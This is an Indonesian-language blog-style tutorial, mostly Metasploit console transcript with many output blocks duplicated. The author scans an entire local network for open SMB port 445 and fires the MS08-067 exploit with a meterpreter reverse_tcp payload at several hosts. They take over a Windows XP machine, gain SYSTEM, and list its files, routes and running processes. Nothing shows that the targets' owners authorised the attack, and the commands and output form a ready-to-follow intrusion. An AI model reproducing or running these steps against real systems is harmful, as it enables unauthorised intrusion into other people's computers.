|
Metasploit adalah sebuah tool untuk pentest bisa dibilang kesukaan si pentest :))
tool ini cocok untuk melakukan berbagai analisa system, tapi dapat membuat ketergantungan bagi newbie seperti ane :)) hahahaiii, ngaku"..
ketergantungan yang akan membuat seorang newbie malas untuk menganalisa sendiri, dan bergantung secara terus menerus pada tool ini.
mungkin inilah akibat kemudahan dari oriented object, atau framework.
tapi bisa digunakan untuk bahan pembelajaran.
cara ini mungkin udah banyak di kemukakan oleh pentester laen.
OK, langsung aja.
kali ini kita akan mengexplorasi system yang memiliki bug SMB, bug ini akan terjadi jika user membuka servis sharing, karena sang user tidak mengupdate systemnya, atau karena bajakan, kan target kita si jendela :p.
Jalankan Metasploitnya.
#msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 324 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11606 updated 25 days ago (2011.01.20)
Warning: This copy of the Metasploit Framework was last updated 25 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 324 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11606 updated 25 days ago (2011.01.20)
Warning: This copy of the Metasploit Framework was last updated 25 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >
Jika sudah masuk, terus connect ke databasenya, atau jika databasenya belum ada di create dulu.
msf > db_connect
[*] Usage: db_connect@/
[*] OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*] db_connect user@metasploit3
[*] db_connect user:pass@192.168.0.2/metasploit3
[*] db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect sqlite3
[*] Usage: db_connect
[*] OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*] db_connect user@metasploit3
[*] db_connect user:pass@192.168.0.2/metasploit3
[*] db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect sqlite3
Trus scan target/network yang mempunya port 445 yaitu port nya si SMB, lubank nya si SMB, kok jadi horrneeyy gini yahh, SERIUS OK, OK PAK :)).
anda juga bisa menguunakan nessus, terserahlah.
msf > db_nmap 192.168.1.1/24 -p 445
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-14 21:45 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:E0:4C:A6:FC:AD (Realtek Semiconductor)
Nmap scan report for 192.168.1.10
Host is up (0.0038s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:25:9C:9D:1F:D7 (Cisco-Linksys)
Nmap scan report for 192.168.1.100
Host is up (0.026s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1F:E2:A5:EA:6A (Hon Hai Precision Ind. Co.)
Nmap scan report for 192.168.1.101
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 18:14:56:BD:D7:1C (Unknown)
Nmap scan report for 192.168.1.102
Host is up (0.063s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1F:3A:B9:B3:F0 (Hon Hai Precision Ind.Co.)
Nmap scan report for inj3ct0r (192.168.1.105)
Host is up (0.000076s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 192.168.1.107
Host is up (0.019s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: C4:17:FE:56:2C:B3 (Unknown)
Nmap scan report for 192.168.1.109
Host is up (0.033s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 70:F1:A1:90:E5:51 (Unknown)
Nmap scan report for 192.168.1.110
Host is up (0.021s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 70:F1:A1:17:B0:63 (Unknown)
Nmap scan report for 192.168.1.112
Host is up (0.034s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:00:74:0E:CC (GemTek Technology Co.)
Nmap scan report for 192.168.1.114
Host is up (0.037s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: D8:75:33:6C:D8:08 (Unknown)
Nmap scan report for 192.168.1.115
Host is up (0.020s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:17:C4:09:1F:56 (Quanta Microsystems)
Nmap scan report for 192.168.1.116
Host is up (0.021s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1C:CC:DB:84:1E (Research In Motion Limited)
Nmap scan report for 192.168.1.118
Host is up (0.13s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 70:F1:A1:CC:35:28 (Unknown)
Nmap scan report for 192.168.1.123
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: C4:17:FE:06:C1:65 (Unknown)
Nmap scan report for 192.168.1.124
Host is up (0.13s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:24:21:8B:50:12 (Micro-star Int'l CO.)
Nmap scan report for 192.168.1.132
Host is up (0.088s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:26:C6:23:09:0E (Intel Corporate)
Nmap scan report for 192.168.1.133
Host is up (0.11s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: AC:81:12:04:1B:61 (Unknown)
Nmap done: 256 IP addresses (18 hosts up) scanned in 30.24 seconds
msf >
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-14 21:45 WIT
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:E0:4C:A6:FC:AD (Realtek Semiconductor)
Nmap scan report for 192.168.1.10
Host is up (0.0038s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:25:9C:9D:1F:D7 (Cisco-Linksys)
Nmap scan report for 192.168.1.100
Host is up (0.026s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1F:E2:A5:EA:6A (Hon Hai Precision Ind. Co.)
Nmap scan report for 192.168.1.101
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 18:14:56:BD:D7:1C (Unknown)
Nmap scan report for 192.168.1.102
Host is up (0.063s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1F:3A:B9:B3:F0 (Hon Hai Precision Ind.Co.)
Nmap scan report for inj3ct0r (192.168.1.105)
Host is up (0.000076s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 192.168.1.107
Host is up (0.019s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: C4:17:FE:56:2C:B3 (Unknown)
Nmap scan report for 192.168.1.109
Host is up (0.033s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 70:F1:A1:90:E5:51 (Unknown)
Nmap scan report for 192.168.1.110
Host is up (0.021s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 70:F1:A1:17:B0:63 (Unknown)
Nmap scan report for 192.168.1.112
Host is up (0.034s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:00:74:0E:CC (GemTek Technology Co.)
Nmap scan report for 192.168.1.114
Host is up (0.037s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: D8:75:33:6C:D8:08 (Unknown)
Nmap scan report for 192.168.1.115
Host is up (0.020s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:17:C4:09:1F:56 (Quanta Microsystems)
Nmap scan report for 192.168.1.116
Host is up (0.021s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1C:CC:DB:84:1E (Research In Motion Limited)
Nmap scan report for 192.168.1.118
Host is up (0.13s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 70:F1:A1:CC:35:28 (Unknown)
Nmap scan report for 192.168.1.123
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: C4:17:FE:06:C1:65 (Unknown)
Nmap scan report for 192.168.1.124
Host is up (0.13s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:24:21:8B:50:12 (Micro-star Int'l CO.)
Nmap scan report for 192.168.1.132
Host is up (0.088s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:26:C6:23:09:0E (Intel Corporate)
Nmap scan report for 192.168.1.133
Host is up (0.11s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: AC:81:12:04:1B:61 (Unknown)
Nmap done: 256 IP addresses (18 hosts up) scanned in 30.24 seconds
msf >
Nahh,,, nihh,,,nohh, yang 445/tcp open inilah yang kita carii, lanjoott.
Selanjutnya gunakan oexpoit exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
Snda bisa liat info dari exploit ini dengan perintah info, exploit ini terjadi karena stack yang corrupt.
msf exploit(ms08_067_netapi) > info
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 10471
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm
Brett Moore
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP1 Japanese (NO NX)
9 Windows 2003 SP2 English (NO NX)
10 Windows 2003 SP2 English (NX)
11 Windows 2003 SP2 German (NO NX)
12 Windows 2003 SP2 German (NX)
13 Windows XP SP2 Arabic (NX)
14 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
15 Windows XP SP2 Chinese - Simplified (NX)
16 Windows XP SP2 Chinese - Traditional (NX)
17 Windows XP SP2 Czech (NX)
18 Windows XP SP2 Danish (NX)
19 Windows XP SP2 German (NX)
20 Windows XP SP2 Greek (NX)
21 Windows XP SP2 Spanish (NX)
22 Windows XP SP2 Finnish (NX)
23 Windows XP SP2 French (NX)
24 Windows XP SP2 Hebrew (NX)
25 Windows XP SP2 Hungarian (NX)
26 Windows XP SP2 Italian (NX)
27 Windows XP SP2 Japanese (NX)
28 Windows XP SP2 Korean (NX)
29 Windows XP SP2 Dutch (NX)
30 Windows XP SP2 Norwegian (NX)
31 Windows XP SP2 Polish (NX)
32 Windows XP SP2 Portuguese - Brazilian (NX)
33 Windows XP SP2 Portuguese (NX)
34 Windows XP SP2 Russian (NX)
35 Windows XP SP2 Swedish (NX)
36 Windows XP SP2 Turkish (NX)
37 Windows XP SP3 Arabic (NX)
38 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
39 Windows XP SP3 Chinese - Simplified (NX)
40 Windows XP SP3 Chinese - Traditional (NX)
41 Windows XP SP3 Czech (NX)
42 Windows XP SP3 Danish (NX)
43 Windows XP SP3 German (NX)
44 Windows XP SP3 Greek (NX)
45 Windows XP SP3 Spanish (NX)
46 Windows XP SP3 Finnish (NX)
47 Windows XP SP3 French (NX)
48 Windows XP SP3 Hebrew (NX)
49 Windows XP SP3 Hungarian (NX)
50 Windows XP SP3 Italian (NX)
51 Windows XP SP3 Japanese (NX)
52 Windows XP SP3 Korean (NX)
53 Windows XP SP3 Dutch (NX)
54 Windows XP SP3 Norwegian (NX)
55 Windows XP SP3 Polish (NX)
56 Windows XP SP3 Portuguese - Brazilian (NX)
57 Windows XP SP3 Portuguese (NX)
58 Windows XP SP3 Russian (NX)
59 Windows XP SP3 Swedish (NX)
60 Windows XP SP3 Turkish (NX)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
NEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)
msf exploit(ms08_067_netapi) >
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 10471
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm
Brett Moore
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP1 Japanese (NO NX)
9 Windows 2003 SP2 English (NO NX)
10 Windows 2003 SP2 English (NX)
11 Windows 2003 SP2 German (NO NX)
12 Windows 2003 SP2 German (NX)
13 Windows XP SP2 Arabic (NX)
14 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
15 Windows XP SP2 Chinese - Simplified (NX)
16 Windows XP SP2 Chinese - Traditional (NX)
17 Windows XP SP2 Czech (NX)
18 Windows XP SP2 Danish (NX)
19 Windows XP SP2 German (NX)
20 Windows XP SP2 Greek (NX)
21 Windows XP SP2 Spanish (NX)
22 Windows XP SP2 Finnish (NX)
23 Windows XP SP2 French (NX)
24 Windows XP SP2 Hebrew (NX)
25 Windows XP SP2 Hungarian (NX)
26 Windows XP SP2 Italian (NX)
27 Windows XP SP2 Japanese (NX)
28 Windows XP SP2 Korean (NX)
29 Windows XP SP2 Dutch (NX)
30 Windows XP SP2 Norwegian (NX)
31 Windows XP SP2 Polish (NX)
32 Windows XP SP2 Portuguese - Brazilian (NX)
33 Windows XP SP2 Portuguese (NX)
34 Windows XP SP2 Russian (NX)
35 Windows XP SP2 Swedish (NX)
36 Windows XP SP2 Turkish (NX)
37 Windows XP SP3 Arabic (NX)
38 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
39 Windows XP SP3 Chinese - Simplified (NX)
40 Windows XP SP3 Chinese - Traditional (NX)
41 Windows XP SP3 Czech (NX)
42 Windows XP SP3 Danish (NX)
43 Windows XP SP3 German (NX)
44 Windows XP SP3 Greek (NX)
45 Windows XP SP3 Spanish (NX)
46 Windows XP SP3 Finnish (NX)
47 Windows XP SP3 French (NX)
48 Windows XP SP3 Hebrew (NX)
49 Windows XP SP3 Hungarian (NX)
50 Windows XP SP3 Italian (NX)
51 Windows XP SP3 Japanese (NX)
52 Windows XP SP3 Korean (NX)
53 Windows XP SP3 Dutch (NX)
54 Windows XP SP3 Norwegian (NX)
55 Windows XP SP3 Polish (NX)
56 Windows XP SP3 Portuguese - Brazilian (NX)
57 Windows XP SP3 Portuguese (NX)
58 Windows XP SP3 Russian (NX)
59 Windows XP SP3 Swedish (NX)
60 Windows XP SP3 Turkish (NX)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
NEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)
msf exploit(ms08_067_netapi) >
Selanjutnya set target dari list di atas/hasil scan pak nmap tadi, dengan cara set RHOST x.x.x.x (IP)
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.123
RHOST => 192.168.1.123
msf exploit(ms08_067_netapi) >
RHOST => 192.168.1.123
msf exploit(ms08_067_netapi) >
Trus set payload dan lhost dan port lhost, lhost adalah ip address dari kompi kita.
msf exploit(ms08_067_netapi) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(ms08_067_netapi) > set LPORT 31337
LPORT => 31337
msf exploit(ms08_067_netapi) >
Bisa menggunakan bentuk lain untuk payload, misal : bind_tcp, dll.
cek sekali lagi setingan anda tadii, dengan perintah show option.
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.123 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST 192.168.1.105 yes The listen address
LPORT 31337 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.123 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST 192.168.1.105 yes The listen address
LPORT 31337 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
OK, sudah tersusun dengan rapi persiapan kita, mari luncurkan exploitnya, dengan cara ketikkan exploit.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.105:31337
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] No matching target
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.1.105:31337
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] No matching target
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
Ternyata target kita tidak vulnerable terhadap bug ini, karena systemnya win 7, kita bisa menggunakan exploit lain, tapi saya tidak ingin tinggal kan exploit yang sedang berjalan, satu perihal, "jangan pernah tingalkan suatu hal begitu saja, jangan menyerah", mari kita coba target lain.
kita coba yang yang x.x.1.118
msf exploit(ms08_067_netapi) > set RHOST 192.168.118
RHOST => 192.168.118
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1.118
RHOST => 192.168.1.1.118
msf exploit(ms08_067_netapi) > exploit
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
RHOST => 192.168.118
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1.118
RHOST => 192.168.1.1.118
msf exploit(ms08_067_netapi) > exploit
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
Ternyata gk bisa juga mungkin karena jaringan didisconnect, tadi sempat putus jaringan saya, coba target lain lagi.
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.112
RHOST => 192.168.1.112
Jalankan lagi exploitnya.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.105:31337
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.105:31337 -> 192.168.1.112:2424) at Mon Feb 14 22:05:03 +0700 2011
meterpreter > 'BINGGO'
[*] Started reverse handler on 192.168.1.105:31337
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.105:31337 -> 192.168.1.112:2424) at Mon Feb 14 22:05:03 +0700 2011
meterpreter > 'BINGGO'
Akhirnya kita masuk ke komputer target, meterpreter > menandakan kita sudah di dalam komputer target.
selanjutnya, kita liat-liat dulu.
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > pwd
C:\WINDOWS
meterpreter > cd ..
meterpreter > ls -la
[-] stdapi_fs_ls: Operation failed: The system cannot find the path specified.
meterpreter > ls (untuk melihat isi disk)
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil Fri May 07 19:43:57 +0700 2010 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Fri May 07 19:43:57 +0700 2010 CONFIG.SYS
40777/rwxrwxrwx 0 dir Fri Nov 05 09:25:41 +0700 2010 Documents and Settings
100444/r--r--r-- 0 fil Fri May 07 19:43:57 +0700 2010 IO.SYS
40777/rwxrwxrwx 0 dir Fri May 07 19:51:24 +0700 2010 Intel
100444/r--r--r-- 0 fil Fri May 07 19:43:57 +0700 2010 MSDOS.SYS
40555/r-xr-xr-x 0 dir Sat May 08 11:38:42 +0700 2010 MSOCache
100555/r-xr-xr-x 47564 fil Wed Sep 01 06:00:00 +0700 2004 NTDETECT.COM
100666/rw-rw-rw- 13030 fil Fri Nov 05 21:16:08 +0700 2010 PDOXUSRS.NET
40555/r-xr-xr-x 0 dir Tue Feb 08 15:22:49 +0700 2011 Program Files
40777/rwxrwxrwx 0 dir Fri May 07 19:56:32 +0700 2010 RECYCLER
40777/rwxrwxrwx 0 dir Thu Nov 04 08:15:35 +0700 2010 SWSetup
40777/rwxrwxrwx 0 dir Fri May 07 19:48:06 +0700 2010 System Volume Information
40777/rwxrwxrwx 0 dir Sat Feb 05 23:15:05 +0700 2011 TransTool
40777/rwxrwxrwx 0 dir Tue Feb 08 15:49:30 +0700 2011 WINDOWS
40777/rwxrwxrwx 0 dir Sat May 08 11:22:33 +0700 2010 [Smad-Cage]
100666/rw-rw-rw- 211 fil Sat May 08 11:57:11 +0700 2010 boot.ini
40555/r-xr-xr-x 0 dir Tue Dec 21 12:46:52 +0700 2010 cwsandbox
100444/r--r--r-- 250032 fil Wed Sep 01 06:00:00 +0700 2004 ntldr
100666/rw-rw-rw- 2145386496 fil Mon Feb 14 20:52:46 +0700 2011 pagefile.sys
meterpreter >ipconfig (untuk meliat IP dari adapter)
Bluetooth LAN Access Server Driver - Packet Scheduler Miniport
Hardware MAC: 00:21:86:b2:8d:7e
IP Address : 0.0.0.0
Netmask : 0.0.0.0
Realtek RTL8169/8110 Family Gigabit Ethernet NIC - Packet Scheduler Miniport
Hardware MAC: 00:1e:ec:ec:6b:6a
IP Address : 0.0.0.0
Netmask : 0.0.0.0
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Broadcom 802.11b/g WLAN - Packet Scheduler Miniport
Hardware MAC: 00:21:00:74:0e:cc
IP Address : 192.168.1.112 <- ini dya IPnya :))
Netmask : 255.255.255.0
meterpreter > route ( route dari si komputer )
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.1.1
127.0.0.0 255.0.0.0 127.0.0.1
192.168.1.0 255.255.255.0 192.168.1.112
192.168.1.112 255.255.255.255 127.0.0.1
192.168.1.255 255.255.255.255 192.168.1.112
224.0.0.0 240.0.0.0 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
255.255.255.255 255.255.255.255 192.168.1.112
meterpreter > getsystem
...got system (via technique 1).
meterpreter > get
getdesktop getlwd getpid getprivs getsystem getuid getwd
meterpreter > getuid ( uid atau usermode )
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 1308
meterpreter > ps ( melihat list program yang sedang jalan )
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
848 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
976 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1000 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1044 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1056 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1224 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1268 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1308 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1456 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1520 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1876 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
1992 explorer.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\Explorer.EXE
740 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1404 igfxtray.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxtray.exe
1412 hkcmd.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\hkcmd.exe
1424 igfxpers.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxpers.exe
1552 igfxsrvc.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\igfxsrvc.exe
1592 AvastUI.exe x86 0 COMPAQ-056192EE\compaq C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe
1672 SM?RTP.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Smadav\SM?RTP.exe
1692 PDVDServ.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
1728 realsched.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Common Files\Real\Update_OB\realsched.exe
1812 sttray.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\sttray.exe
1164 IDMan.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Internet Download Manager\IDMan.exe
2016 ctfmon.exe x86 0 COMPAQ-056192EE\compaq C:\WINDOWS\system32\ctfmon.exe
280 btwdins.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
288 BTTray.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
400 RichVideo.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\CyberLink\Shared Files\RichVideo.exe
600 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2156 BTSTAC~1.EXE x86 0 COMPAQ-056192EE\compaq C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
2888 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
3256 IEMonitor.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Internet Download Manager\IEMonitor.exe
1320 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2772 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
3056 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
4032 firefox.exe x86 0 COMPAQ-056192EE\compaq C:\Program Files\Mozilla Firefox\firefox.exe
3976 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
3048 chrome.exe x86 0 COMPAQ-056192EE\compaq C:\Documents and Settings\compaq\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
